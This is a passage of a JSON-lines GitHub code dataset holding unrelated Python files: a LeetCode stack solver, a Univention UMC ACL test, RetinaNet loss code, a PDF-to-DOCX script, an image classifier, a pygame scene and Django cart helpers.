print(dpFunc(n))\n","repo_name":"Jionee/Algorithm","sub_path":"Boj/11726.py","file_name":"11726.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"23910194904","text":"# https://leetcode.com/problems/evaluate-reverse-polish-notation/\n\n\nclass Solution:\n def evalRPN(self, tokens: List[str]) -> int:\n stack = []\n for token in tokens:\n if token in [\"+\", \"-\", \"*\", \"/\"]:\n op = token\n num1 = stack.pop()\n num2 = stack.pop()\n result = eval(\"(%s) %s (%s)\" % (num2, op, num1))\n result = int(result)\n stack.append(str(result))\n else:\n stack.append(token)\n\n return stack.pop()\n","repo_name":"h-spear/problem-solving-python","sub_path":"leetcode/stack/evaluate-reverse-polish-notation.py","file_name":"evaluate-reverse-polish-notation.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"19869594151","text":"#!/usr/share/ucs-test/runner pytest-3 -s -l -vv\n## desc: Test UMC ACLs\n## roles:\n## - domaincontroller_master\n## packages:\n## - univention-directory-manager-tools\n## - univention-management-console\n## exposure: dangerous\n\n\nimport pytest\n\nfrom univention.lib.umc import Forbidden\nfrom univention.testing.umc import Client\n\n\ndef test_acls(udm, ucr):\n test_user, username = 
udm.create_user(wait_for_replication=False, check_for_drs_replication=False, wait_for=False)\n hostname = ucr.get('hostname')\n\n operation_sets = []\n\n for i in range(1, 11):\n operation_sets.append(udm.create_object(\n 'settings/umc_operationset',\n position=\"cn=operations,cn=UMC,cn=univention,%s\" % udm.LDAP_BASE,\n name='join%s' % i,\n description='Join%s' % i,\n operation=[\"join/*\", \"lib/server/*\"],\n wait_for_replication=False,\n ))\n policy_dn = udm.create_object(\n 'policies/umc',\n position=\"cn=UMC,cn=policies,%s\" % udm.LDAP_BASE,\n name='test-umc-policy',\n wait_for_replication=False,\n )\n udm.modify_object('users/user', dn=test_user, policy_reference=policy_dn, wait_for_replication=False)\n\n def _test_new_acl(operation_set_dn, new_values, should_work=True):\n udm.modify_object('settings/umc_operationset', dn=operation_set_dn, hosts=new_values, wait_for_replication=False)\n udm.modify_object('policies/umc', dn=policy_dn, allow=operation_set_dn, wait_for_replication=False)\n\n if should_work:\n data = Client(None, username, 'univention').umc_command('join/scripts/query').result\n assert isinstance(data, list), data\n else:\n with pytest.raises(Forbidden):\n Client(None, username, 'univention').umc_command('join/scripts/query').result # noqa: B018\n\n _test_new_acl(operation_sets[0], ['systemrole:domaincontroller_master', 'systemrole:domaincontroller_backup'])\n _test_new_acl(operation_sets[1], ['systemrole:domaincontroller_master'])\n _test_new_acl(operation_sets[2], ['systemrole:domaincontroller_backup'], False)\n _test_new_acl(operation_sets[3], ['foo', '%s' % hostname])\n _test_new_acl(operation_sets[4], ['*'])\n _test_new_acl(operation_sets[5], ['foo'], False)\n _test_new_acl(operation_sets[6], ['service:LDAP'])\n _test_new_acl(operation_sets[7], ['service:LDAP', 'service:FOO'])\n _test_new_acl(operation_sets[8], ['service:BAR'], False)\n _test_new_acl(operation_sets[9], ['*%s' % hostname[2:]])\n","repo_name":"univention/univention-corporate-server","sub_path":"test/ucs-test/tests/60_umc/03_acls.py","file_name":"03_acls.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"en","doc_type":"code","stars":166,"dataset":"github-code","pt":"33"} +{"seq_id":"11274369133","text":"import torch.nn as nn\nimport torch\nfrom model.retina_config import DefaultConfig\nimport numpy as np\n\ndef coords_fmap2orig(image_shape,stride):\n '''\n transfor one fmap coords to orig coords\n Args\n featurn [batch_size,h,w,c]\n stride int\n Returns\n coords [n,2]\n '''\n h,w= image_shape\n shifts_x = torch.arange(0, w * stride, stride, dtype=torch.float32)\n shifts_y = torch.arange(0, h * stride, stride, dtype=torch.float32)\n\n shift_y, shift_x = torch.meshgrid(shifts_y, shifts_x)\n shift_x = torch.reshape(shift_x, [-1])\n shift_y = torch.reshape(shift_y, [-1])\n coords = torch.stack([shift_x, shift_y, shift_x, shift_y], -1) + stride // 2\n return coords\n\nclass GenAnchors(nn.Module):\n def __init__(self, config = None):\n super().__init__()\n if config is None:\n self.config = DefaultConfig\n else:\n self.config = config\n\n self.pyramid_levels = self.config.pyramid_levels\n self.ratios = np.array(self.config.ratios)\n self.scales = np.array(self.config.scales)\n self.size = self.config.sizes\n self.strides = self.config.strides\n\n def forward(self, image):\n H, W = image.size(2), image.size(3) #(ori_H, ori_W)\n feature_size = [(H / stride, W / stride) for stride in self.strides]\n all_anchors = []\n for i in range(len(feature_size)):\n anchors = 
self.generate_anchors(self.size[i], self.ratios, self.scales)\n shift_anchors = self.shift(anchors, feature_size[i], self.strides[i]) #(H*W, A, 4)\n all_anchors.append(shift_anchors)\n all_anchors = torch.cat(all_anchors, dim = 0)\n return all_anchors\n\n def generate_anchors(self, base_size=16, ratios=None, scales=None):\n if ratios is None:\n ratios = np.array([0.5, 1, 2])\n if scales is None:\n scales = np.array([2 ** 0, 2 ** (1.0 / 3.0), 2 ** (2.0 / 3.0)])\n\n num_anchors = len(ratios) * len(scales) # 9\n anchors = np.zeros((num_anchors, 4))\n anchors[:, 2:] = base_size * np.tile(scales, (2, len(ratios))).T\n # compute areas of anchors\n areas = anchors[:, 2] * anchors[:, 3] # (9,)\n # fix the ratios of w, h\n anchors[:, 2] = np.sqrt(areas / np.repeat(ratios, len(scales))) # (9,)\n anchors[:, 3] = anchors[:, 2] * np.repeat(ratios, len(scales)) # (9,)\n\n # transfrom from(0 ,0, w, h ) to ( x1, y1, x2, y2)\n anchors[:, 0::2] -= np.tile(anchors[:, 2] * 0.5, (2, 1)).T\n anchors[:, 1::2] -= np.tile(anchors[:, 3] * 0.5, (2, 1)).T\n anchors = torch.from_numpy(anchors).float().cuda() if torch.cuda.is_available() else torch.from_numpy(anchors).float()\n return anchors\n\n def shift(self, anchors, image_shape, stride):\n \"\"\"\n anchors : Tensor(num, 4)\n image_shape : (H, W)\n return shift_anchor: (H*W*num,4)\n \"\"\"\n\n ori_coords = coords_fmap2orig(image_shape, stride) # (H*W, 4) 4:(x,y,x,y)\n ori_coords = ori_coords.to(device=anchors.device)\n shift_anchor = ori_coords[:, None, :] + anchors[None, :, :]\n return shift_anchor.reshape(-1, 4)\n\n\ndef calc_iou(box1, box2):\n \"\"\"\n box1:(M,4)\n box2:(N,4)\n \"\"\"\n lt = torch.max(box1[:,None,:2], box2[:, :2]) #(M,N,2)\n rb = torch.min(box1[:,None,2:], box2[:, 2:]) #(M,N,2)\n wh = torch.clamp(rb - lt , min=0.0) #(M, N, 2)\n inter_area = wh[..., 0] * wh[..., 1] #(M, N)\n area_box1 = (box1[:, 2] - box1[:, 0]) * (box1[:, 3] - box1[:, 1]) #(M,)\n area_box2 = (box2[:, 2] - box2[:, 0]) * (box2[:, 3] - box2[:, 1]) #(N,)\n\n iou = inter_area / (area_box1[:,None] + area_box2 - inter_area + 1e-16) #(M,N)\n\n return iou\ndef focal_loss(preds, targets, alpha=0.25, gamma = 2.0):\n preds = preds.sigmoid()\n preds = torch.clamp(preds, min=1e-4,max = 1. - 1e-4)\n if torch.cuda.is_available():\n alpha_factor = torch.ones(targets.shape).cuda() * alpha\n else:\n alpha_factor = torch.ones(targets.shape) * alpha\n\n alpha_factor = torch.where(torch.eq(targets, 1.), alpha_factor, (1. - alpha_factor))\n focal_weights = torch.where(torch.eq(targets, 1.), 1 - preds, preds)\n focal_weights = alpha_factor * torch.pow(focal_weights, gamma)\n\n bce = - (targets * torch.log(preds) + (1. - targets) * torch.log(1. 
- preds))\n cls_loss = focal_weights * bce\n\n if torch.cuda.is_available():\n cls_loss = torch.where(torch.ne(targets, -1.0), cls_loss, torch.zeros_like(cls_loss).cuda())\n else:\n cls_loss = torch.where(torch.ne(targets, -1.0), cls_loss, torch.zeros_like(cls_loss))\n\n return cls_loss.sum()\n\n\ndef smooth_l1(pos_inds,anchor_infos, boxes,reg_pred):\n \"\"\"\n pos_inds : (num_pos,)\n boxes:(sum(H*W)*A, 4)\n reg_pred: (sum(H*W)*A, 4)\n \"\"\"\n anchor_widths, anchor_heights, anchor_ctr_x, anchor_ctr_y = anchor_infos #(sum(H*W)*A,)\n if pos_inds.sum() > 0:\n\n pos_reg_pred = reg_pred[pos_inds,:] #(num_pos, 4)\n\n gt_widths = boxes[pos_inds][:, 2] - boxes[pos_inds][:, 0]\n gt_heights = boxes[pos_inds][:, 3] - boxes[pos_inds][:, 1]\n gt_ctr_x = boxes[pos_inds][:, 0] + gt_widths * 0.5\n gt_ctr_y = boxes[pos_inds][:, 1] + gt_heights * 0.5\n\n pos_anchor_widths = anchor_widths[pos_inds]\n pos_anchor_heights = anchor_heights[pos_inds]\n pos_anchor_ctr_x = anchor_ctr_x[pos_inds]\n pos_anchor_ctr_y = anchor_ctr_y[pos_inds]\n\n gt_widths = torch.clamp(gt_widths, min=1.0)\n gt_heights = torch.clamp(gt_heights, min=1.0)\n\n target_dx = (gt_ctr_x - pos_anchor_ctr_x) / pos_anchor_widths\n target_dy = (gt_ctr_y - pos_anchor_ctr_y) / pos_anchor_heights\n target_dw = torch.log(gt_widths / pos_anchor_widths)\n target_dh = torch.log(gt_heights / pos_anchor_heights)\n\n targets = torch.stack([target_dx,target_dy,target_dw,target_dh], dim=0).t() #(num_pos,4)\n if torch.cuda.is_available():\n targets = targets / torch.FloatTensor([0.1,0.1,0.2,0.2]).cuda()\n else:\n targets = targets / torch.FloatTensor([0.1,0.1,0.2,0.2])\n\n\n reg_diff = torch.abs(targets - pos_reg_pred) #(num_pos,4)\n reg_loss = torch.where(\n torch.le(reg_diff, 1.0/9.0),\n 0.5 * 9.0 * torch.pow(reg_diff, 2),\n reg_diff - 0.5 /9.0\n )\n return reg_loss.mean()\n else:\n if torch.cuda.is_available():\n reg_loss = torch.tensor(0).float().cuda()\n else:\n reg_loss = torch.tensor(0).float()\n\n return reg_loss\n\ndef giou(pos_inds,anchor_infos, boxes,reg_pred):\n \"\"\"\n pos_inds : (num_pos,)\n boxes:(sum(H*W)*A, 4)\n reg_pred: (sum(H*W)*A, 4)\n \"\"\"\n anchor_widths, anchor_heights, anchor_ctr_x, anchor_ctr_y = anchor_infos #(sum(H*W)*A,)\n if pos_inds.sum() > 0:\n\n pos_reg_pred = reg_pred[pos_inds,:] #(num_pos, 4)\n\n gt_boxes = boxes[pos_inds,:] #(num_pos, 4)\n\n pos_anchor_widths = anchor_widths[pos_inds] #(num_pos,)\n pos_anchor_heights = anchor_heights[pos_inds] #(num_pos,)\n pos_anchor_ctr_x = anchor_ctr_x[pos_inds] #(num_pos,)\n pos_anchor_ctr_y = anchor_ctr_y[pos_inds] #(num_pos,)\n\n\n dx = pos_reg_pred[:, 0] * 0.1 #(num_pos,)\n dy = pos_reg_pred[:, 1] * 0.1 #(num_pos,)\n dw = pos_reg_pred[:, 2] * 0.2 #(num_pos,)\n dh = pos_reg_pred[:, 3] * 0.2 #(num_pos,)\n\n pred_ctr_x = dx * pos_anchor_widths + pos_anchor_ctr_x #(num_pos,)\n pred_ctr_y = dy * pos_anchor_heights + pos_anchor_ctr_y #(num_pos,)\n pred_w = torch.exp(dw) * pos_anchor_widths #(num_pos,)\n pred_h = torch.exp(dh) * pos_anchor_heights #(num_pos,)\n\n pred_x1 = pred_ctr_x - pred_w * 0.5 #(num_pos,)\n pred_y1 = pred_ctr_y - pred_h * 0.5 #(num_pos,)\n pred_x2 = pred_ctr_x + pred_w * 0.5 #(num_pos,)\n pred_y2 = pred_ctr_y + pred_h * 0.5 #(num_pos,)\n\n preds_boxes = torch.stack([pred_x1,pred_y1,pred_x2,pred_y2], dim=0).t() #(num_pos,4)\n reg_loss = compute_giou_loss(gt_boxes, preds_boxes)\n else:\n if torch.cuda.is_available():\n reg_loss = torch.tensor(0).float().cuda()\n else:\n reg_loss = torch.tensor(0).float()\n\n return reg_loss\n\ndef compute_giou_loss(boxes1, boxes2):\n 
\"\"\"\n boxes1 :(N,4) (x1,y1,x2,y2)\n boxes2: (N,4) (x1,y1,x2,y2)\n \"\"\"\n x1y1 = torch.max(boxes1[:, :2], boxes2[:, :2])\n x2y2 = torch.min(boxes1[:, 2:], boxes2[:, 2:])\n wh = torch.clamp(x2y2 - x1y1, min=0.)\n area_inter = wh[:, 0] * wh[:, 1]\n area_b1 = (boxes1[:, 2] - boxes1[:, 0]) * (boxes1[:, 3] - boxes1[:, 1])\n area_b2 = (boxes2[:, 2] - boxes2[:, 0]) * (boxes2[:, 3] - boxes2[:, 1])\n union = area_b1 + area_b2 - area_inter\n iou = area_inter / (union + 1e-16)\n\n x1y1_max = torch.min(boxes1[:, :2], boxes2[:, :2])\n x2y2_max = torch.max(boxes1[:, 2:], boxes2[:, 2:])\n g_wh = torch.clamp(x2y2_max - x1y1_max, min=0.)\n g_area = g_wh[:, 0] * g_wh[:, 1]\n\n giou = iou - (g_area - union) / g_area.clamp(1e-10)\n loss = 1. - giou\n return loss.mean()\n\nclass LOSS(nn.Module):\n def __init__(self,reg_mode = 'giou'):\n super(LOSS, self).__init__()\n self.reg_mode = reg_mode\n\n def forward(self, inputs):\n \"\"\"\n cls_logits :(n, sum(H*W)*A, class_num+1)\n reg_preds:(n, sum(H*W)*A, 4)\n anchors:(sum(H*W)*A, 4)\n boxes:(n, max_num, 4)\n classes:(n, max_num)\n \"\"\"\n cls_logits, reg_preds, anchors, boxes, classes = inputs\n anchor_widths = anchors[:, 2] - anchors[:, 0]\n anchor_heights = anchors[:, 3] - anchors[:, 1]\n anchor_ctr_x = anchors[:, 0] + anchor_widths * 0.5\n anchor_ctr_y = anchors[:, 1] + anchor_heights * 0.5\n\n bacth_size = cls_logits.shape[0]\n class_loss = []\n reg_loss = []\n for i in range(bacth_size):\n per_cls_logit = cls_logits[i,:,:] #(sum(H*W)*A, class_num)\n per_reg_pred = reg_preds[i,:,:]\n per_boxes = boxes[i,:,:]\n per_classes = classes[i,:]\n mask = per_boxes[:, 0] != -1\n per_boxes = per_boxes[mask] #(?, 4)\n per_classes = per_classes[mask] #(?,)\n if per_classes.shape[0] == 0:\n alpha_factor = torch.ones(per_cls_logit.shape).cuda() * 0.25 if torch.cuda.is_available() else torch.ones(per_cls_logit.shape) * 0.25\n alpha_factor = 1. 
- alpha_factor\n focal_weights = per_cls_logit\n focal_weights = alpha_factor * torch.pow(focal_weights, 2.0)\n bce = -(torch.log(1.0 - per_cls_logit))\n cls_loss = focal_weights * bce\n class_loss.append(cls_loss.sum())\n reg_loss.append(torch.tensor(0).float())\n continue\n IoU = calc_iou(anchors, per_boxes) #(sum(H*W)*A, ?)\n\n iou_max, max_ind = torch.max(IoU, dim=1) #(sum(H*W)*A,)\n \n \n targets = torch.ones_like(per_cls_logit) * -1 #(sum(H*W)*A, class_num)\n \n \n targets[iou_max < 0.4, :] = 0 #bg\n\n pos_anchors_ind = iou_max >= 0.5 #(?,)\n num_pos = torch.clamp(pos_anchors_ind.sum().float(), min=1.0)\n\n assigned_classes = per_classes[max_ind] #(sum(H*W)*A, )\n assigned_boxes = per_boxes[max_ind,:] #(sum(H*W)*A, 4)\n\n targets[pos_anchors_ind,:] = 0\n targets[pos_anchors_ind, (assigned_classes[pos_anchors_ind]).long() - 1] = 1\n\n class_loss.append(focal_loss(per_cls_logit, targets).view(1) / num_pos)\n if self.reg_mode == 'smoothl1':\n reg_loss.append(smooth_l1(pos_anchors_ind, [anchor_widths,anchor_heights,anchor_ctr_x,anchor_ctr_y],\n assigned_boxes,per_reg_pred))\n elif self.reg_mode =='giou':\n reg_loss.append(giou(pos_anchors_ind, [anchor_widths, anchor_heights, anchor_ctr_x, anchor_ctr_y],\n assigned_boxes, per_reg_pred))\n\n cls_loss = torch.stack(class_loss).mean()\n reg_loss = torch.stack(reg_loss).mean()\n total_loss = cls_loss + reg_loss\n return cls_loss, reg_loss, total_loss\n\n\nif __name__ ==\"__main__\":\n \"\"\"\n cls_logits :(n, sum(H*W)*A, class_num+1)\n reg_preds:(n, sum(H*W)*A, 4)\n anchors:(sum(H*W)*A, 4)\n boxes:(n, max_num, 4)\n classes:(n, max_num)\n \"\"\"\n image = torch.rand((1,3,512,384))\n anchor_model = GenAnchors()\n anchors = anchor_model(image)\n boxes = [[69,172,270,330],[150,141,229,284],[258,198,297,329]]\n classes = [12,1,1]\n boxes = torch.FloatTensor(boxes) #(3,4)\n boxes = torch.nn.functional.pad(boxes,[0, 0, 0, 47],value=-1).unsqueeze(dim=0)\n classes = torch.FloatTensor(classes) #(3,)\n classes = torch.nn.functional.pad(classes,[0,47],value=-1).unsqueeze(dim=0)\n annotation = torch.cat([boxes,classes.unsqueeze(dim=2)], dim=2)\n #print(annotation)\n # print(anchors.dtype)\n # print(boxes.dtype)\n cls_logits = torch.ones((1,36828,20)) * 0.5\n reg_preds = torch.ones((1,36828,4))\n loss = LOSS()\n print(loss([cls_logits,reg_preds,anchors,boxes,classes]))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"zhenghao977/RetinaNet-Pytorch-36.4AP","sub_path":"model/retina_loss.py","file_name":"retina_loss.py","file_ext":"py","file_size_in_byte":13196,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"33"} +{"seq_id":"71200208734","text":"def get_lots_stats(queryset):\n '''Extract stats from a given lots' 'queryset' '''\n stats ={'total_poids_Ta':0,\n 'total_poids_Sn':0,\n 'total_poids_W':0,\n 'total_colis_Ta':0,\n 'total_colis_Sn':0,\n 'total_colis_W':0}\n for obj in queryset:\n if obj.minerai.symbol == 'Ta':\n stats['total_poids_Ta'] += obj.poids\n stats['total_colis_Ta'] += obj.colis\n elif obj.minerai.symbol == 'Sn':\n stats['total_poids_Sn'] += obj.poids\n stats['total_colis_Sn'] += obj.colis\n elif obj.minerai.symbol == 'W':\n stats['total_poids_W'] += obj.poids\n stats['total_colis_W'] += obj.colis\n return stats","repo_name":"elieidrissa/cfm-pro-api","sub_path":"cfm_pro_api/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"16493681896","text":"import PyPDF2\nimport 
docx\nimport argparse\nimport os\n\nPDFfilename = 'C:/Users/Shahnawaz/Downloads/MCA_First_Year.pdf'\nOutputLocation = 'docs.docx'\n\na=[]\n\n#parser = argparse.ArgumentParser(description='Extract Text from Pdf into Docx...')\n#parser.add_argument('pdfFileName', type=str,help='Pdf File Name or Path to the pdf file..')\n#parser.add_argument(\"-o\",'--OutputLocation', type=str,help='Output path to store converted Pdf as .docx extension ..',default=\"C:/Users/Administrator/Desktop/default.docx\")\n#args=parser.parse_args()\n#PDFfilename = args.pdfFileName #filename of your PDF/directory where your PDF is stored\n\npdfFileObj=open(PDFfilename,'rb')\npdfReader=PyPDF2.PdfFileReader(pdfFileObj)\nfor i in range(0,pdfReader.numPages):\n pageobj=pdfReader.getPage(i)\n a.append(pageobj.extractText())\npdfFileObj.close()\ndoc = docx.Document()\n\nfor i in range(len(a)):\n doc.add_paragraph(a[i])\n doc.add_page_break()\ndoc.save(OutputLocation)\n","repo_name":"yasharkawasthi/python_projects","sub_path":"files_converter/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"5685654546","text":"import concurrent.futures\nimport functools\nimport typing\n\nimport numpy\nimport PIL.Image\nimport torch\n\nimport models\nimport transforms\n\n\nclass Classifier:\n def __init__(\n self,\n model_name: str = None,\n classes: typing.List[str] = None,\n transform_name: str = None,\n output_to_idx: typing.Callable[[torch.Tensor], torch.Tensor] = None,\n pretained: bool = True,\n **kwargs,\n ) -> None:\n self.model_name = model_name\n self.classes = classes\n self.transform_name = transform_name\n self.output_to_idx = output_to_idx\n if model_name is not None:\n self.model: torch.nn.Module = models.get_model(model_name, len(classes), pretrained=pretained, **kwargs)\n if transform_name is not None:\n self.transform: typing.Callable[[typing.Union[PIL.Image.Image, numpy.ndarray]], torch.Tensor] = getattr(transforms, transform_name)\n\n def classify(self, image: numpy.ndarray) -> str:\n with torch.no_grad():\n input = self.transform(image) # [CHW]\n input = input.reshape(1, *input.shape) # [NCHW]\n self.model.eval()\n output: torch.Tensor = self.model(input)\n idx = self.output_to_idx(output)\n idx = idx.reshape(1)\n idx = idx.item()\n return self.classes[idx]\n\n def state_dict(self, **kwargs):\n d = {}\n d['model_name'] = self.model_name\n d['classes'] = self.classes\n d['transform_name'] = self.transform_name\n d['model_state_dict'] = self.model.state_dict(**kwargs)\n d['name'] = self.__class__.__name__\n return d\n\n def load_state_dict(self, state_dict: dict, strict: bool = True):\n model_name = state_dict['model_name']\n classes = state_dict['classes']\n transform_name = state_dict['transform_name']\n self.model_name = model_name\n self.classes = classes\n self.transform_name = transform_name\n if model_name is not None:\n self.model: torch.nn.Module = models.get_model(model_name, len(classes), pretrained=False)\n if transform_name is not None:\n self.transform: typing.Callable[[typing.Union[PIL.Image.Image, numpy.ndarray]], torch.Tensor] = getattr(transforms, transform_name)\n self.model.load_state_dict(state_dict['model_state_dict'], strict=strict)\n\n\nclass ClassifierArgmax(Classifier):\n def __init__(\n self,\n model_name: str = None,\n classes: typing.List[str] = None,\n transform_name: str = None,\n pretrained: bool = True,\n **kwargs,\n ) -> None:\n super().__init__(model_name, 
classes, transform_name, functools.partial(torch.argmax, dim=-1), pretrained, **kwargs)\n\n\nclass EnsembleClassifier:\n def __init__(self, classifiers: typing.List[Classifier], method=None, threshold=0, prelim: Classifier = None, training_data_dic=None) -> None:\n assert len(classifiers) > 0\n classes = classifiers[0].classes\n for classifier in classifiers:\n assert classifier.classes == classes\n assert method in (None, 'ThreadPoolExecutor')\n\n self.classifiers = classifiers\n self.classes = classes\n self.softmax = torch.nn.Softmax(dim=-1)\n self.output_to_idx = functools.partial(torch.max, dim=-1)\n self.method = method\n self.threshold = threshold\n self.prelim = prelim\n self.training_data_dic = [] if training_data_dic is None else training_data_dic\n\n def fn(self, classifier: Classifier, image: numpy.ndarray):\n input = classifier.transform(image) # [CHW]\n input = input.reshape(1, *input.shape) # [NCHW]\n classifier.model.eval()\n output: torch.Tensor = classifier.model(input)\n return self.softmax(output)\n\n def classify(self, image: numpy.ndarray) -> str:\n if self.prelim is not None:\n c = self.prelim.classify(image)\n if c != 'isnull' and c not in self.training_data_dic:\n print('prelim', c)\n return c\n with torch.no_grad():\n if self.method == 'ThreadPoolExecutor':\n prob = 0\n futures: typing.List[concurrent.futures.Future] = []\n with concurrent.futures.ThreadPoolExecutor(len(self.classifiers)) as executor:\n for classifier in self.classifiers:\n futures.append(executor.submit(self.fn, classifier, image))\n for future in futures:\n prob += future.result()\n prob = prob / len(self.classifiers)\n elif self.method is None:\n prob = 0\n for classifier in self.classifiers:\n prob += self.fn(classifier, image)\n prob = prob / len(self.classifiers)\n max_prob, idx = self.output_to_idx(prob)\n if max_prob < self.threshold:\n c = 'isnull'\n else:\n idx = idx.reshape(1)\n idx = idx.item()\n c = self.classes[idx]\n return c\n","repo_name":"BruceJian43/TBrain2021-Chinese-Character-Recognition","sub_path":"src/classifiers.py","file_name":"classifiers.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"24756759422","text":"#https://www10.lunapic.com/editor/ to edit backgrounds\nimport pygame\nimport random\n\n\npygame.init()\n\nblack = (0,0,0)\nwhite = (255,255,255)\n\nbackground = pygame.image.load(\"Visual Studio Code/Python/Pokemon_battle/Images/background.jpg\")\nbackground = pygame.transform.scale(background, (873*0.5,479*0.5))\nsquirtle = pygame.image.load(\"Visual Studio Code/Python/Pokemon_battle/Images/squirtle.png\")\nsquirtle = pygame.transform.scale(squirtle, (50, 80))\nsquirtle = pygame.transform.flip(squirtle, 180, 0) \ncharmender = pygame.image.load(\"Visual Studio Code/Python/Pokemon_battle/Images/charmender.png\")\ncharmender = pygame.transform.scale(charmender, (50, 80))\nmyfont = pygame.font.SysFont(\"Comic Sans MS\", 20)\ntitle = myfont.render(\"WELCOME TO POKEMON ROYALE\", 1, black)\n\n\n\nSCREEN = pygame.display.set_mode((873*0.5,479*0.5))\nFPS = 50\n\ndef update():\n pygame.display.update()\n pygame.time.Clock().tick(FPS)\n\ndef draw_objects():\n SCREEN.blit(background,(0,0))\n SCREEN.blit(squirtle,(squirtle_x, squirtle_y))\n SCREEN.blit(charmender, (charmender_x, charmender_y))\n SCREEN.blit(title, (title_x,title_y))\n\n\ndef start():\n global squirtle_x, squirtle_y, squirtle_vel, charmender_x, charmender_y, title_x, title_y\n squirtle_x, squirtle_y = 
200*0.5,240*0.5\n charmender_x, charmender_y = 600*0.5, 240*0.5\n squirtle_vel = 0\n title_x, title_y = 50, 20\n\nstart()\n\nrunning = True\n\nwhile running:\n draw_objects()\n update()\n\n\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False","repo_name":"lucavillani/Pokemon_battle","sub_path":"Pokemon Royale - Graphics.py","file_name":"Pokemon Royale - Graphics.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"39109302762","text":"from .models import Cart, CartDetails, Wishlist, CustomAccount\nfrom django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist\nfrom products.models import Product\nfrom django.contrib import messages\nimport json\n\n\ndef get_cart(session):\n cart = session.get(\"user-cart\")\n if cart == None:\n cart = json.dumps({})\n session[\"user-cart\"] = cart\n return json.loads(cart)\n\ndef parse_message(request, message, message_type):\n if message_type == \"info\":\n messages.info(request, message=message)\n elif message_type == \"success\":\n messages.success(request, message=message)\n elif message_type == \"warning\":\n messages.warning(request, message=message)\n elif message_type == \"error\":\n messages.error(request, message=message)\n\ndef add_to_wishlist(user, product):\n # product_id = request.POST[\"product_id\"]\n # product = Product.objects.get(id=product_id)\n if user.is_authenticated:\n user_wishlist = Wishlist.objects.get_or_create(user=user)[0]\n try:\n the_p = user_wishlist.wish_products.get(id=product.id)\n except MultipleObjectsReturned:\n all_duplicated = user_wishlist.wish_products.filter(id=product.id)[1:]\n for item in all_duplicated:\n user_wishlist.wish_products.remove(item)\n message = \"Multiple items found in your Wishlist. Deleting Now.\"\n message_type = \"info\"\n except ObjectDoesNotExist:\n user_wishlist.wish_products.add(product)\n user_wishlist.save()\n message = \"Item added to Wishlist\"\n message_type = \"success\"\n else:\n message = \"This item already exists in your wishlist\"\n message_type = \"info\"\n else:\n message = \"You need to be logged in to add items to your wishlist\"\n message_type = \"warning\"\n\n return message, message_type\n # return JsonResponse({\"message\": message, \"type\": message_type}, status=200)\n\ndef add_to_cart(request, product, quantity):\n quantity = int(quantity)\n # product_exists = Cart.cart_products.get(product)\n user = request.user\n product_id = product.id\n if user.is_authenticated:\n user_cart = Cart.objects.get(user=user)\n user_wishlist = Wishlist.objects.get_or_create(user=user)[0]\n try:\n the_p = user_cart.cart_products.get(id=product.id)\n except MultipleObjectsReturned:\n all_duplicated = user_cart.cart_products.filter(id=product.id)[1:]\n for item in all_duplicated:\n user_cart.cart_products.remove(item)\n message = \"Multiple items found in your cart. 
Deleting Now.\"\n message_type = \"info\"\n except ObjectDoesNotExist:\n detailed_cart = CartDetails.objects.create(\n cart = user_cart,\n product = product,\n quantity = quantity,\n )\n detailed_cart.save()\n message = \"Item added to cart\"\n message_type = \"success\"\n else:\n complete_cart = CartDetails.objects.get(cart=user_cart, product=product)\n complete_cart.quantity += quantity\n complete_cart.save()\n quantity = complete_cart.quantity\n message = \"Cart Updated Successfully\"\n message_type = \"success\"\n user_wishlist.wish_products.remove(product)\n return message, message_type\n else:\n user_cart = get_cart(request.session)\n \n if str(product_id) in user_cart:\n item = user_cart[str(product_id)]\n item_quantity = int(item[\"quantity\"])\n item[\"quantity\"] = str(item_quantity + quantity)\n message = \"Cart Item Updated\"\n quantity = item[\"quantity\"]\n else:\n user_cart[int(product_id)] = {\"quantity\": quantity}\n message = \"Item Added To Cart\"\n request.session['user-cart'] = json.dumps(user_cart)\n message_type = \"success\"\n \n return message, message_type\n\n return message, message_type\n\ndef remove_from_wishlist(user, product):\n if user.is_authenticated:\n try:\n user_wishlist = Wishlist.objects.get(user=user)\n except ObjectDoesNotExist:\n message_type = \"error\"\n message = \"You do not have a wishlist\"\n else:\n user_wishlist.wish_products.remove(product)\n message_type = \"success\"\n message = \"Product removed from wishlist\"\n else:\n message = \"You do not have an account with us\"\n message_type = \"error\"\n\n return message, message_type\n\ndef remove_from_cart(request, product):\n user = request.user\n product_id = str(product.id)\n if user.is_authenticated:\n your_cart = Cart.objects.get(user=user)\n try:\n cart_details = CartDetails.objects.get(cart=your_cart, product=product)\n except ObjectDoesNotExist:\n message = \"This product is not in your cart\"\n message_type= \"error\"\n else:\n cart_details.delete()\n message_type = \"success\"\n message = \"Product removed from cart\"\n else:\n user_cart = get_cart(request.session)\n\n if product_id in user_cart:\n user_cart.pop(product_id)\n message = \"Product removed from cart\"\n message_type = \"success\"\n else:\n message_type = \"error\"\n message = \"This product is not in your cart\"\n\n request.session['user-cart'] = json.dumps(user_cart)\n\n return message, message_type\n\ndef clear_wishlist(user):\n if user.is_authenticated:\n user_wish = Wishlist.objects.get(user=user)\n if user_wish.get_item_count() > 0:\n user_wish.wish_products.clear()\n message = \"All products in your wishlist have been removed\"\n message_type = \"success\"\n else:\n message = \"There are no products in your wishlist\"\n message_type = \"info\"\n else:\n message = \"You are not logged in\"\n message_type = \"warning\"\n\n return message, message_type\n\ndef clear_cart(request):\n user = request.user\n if user.is_authenticated:\n 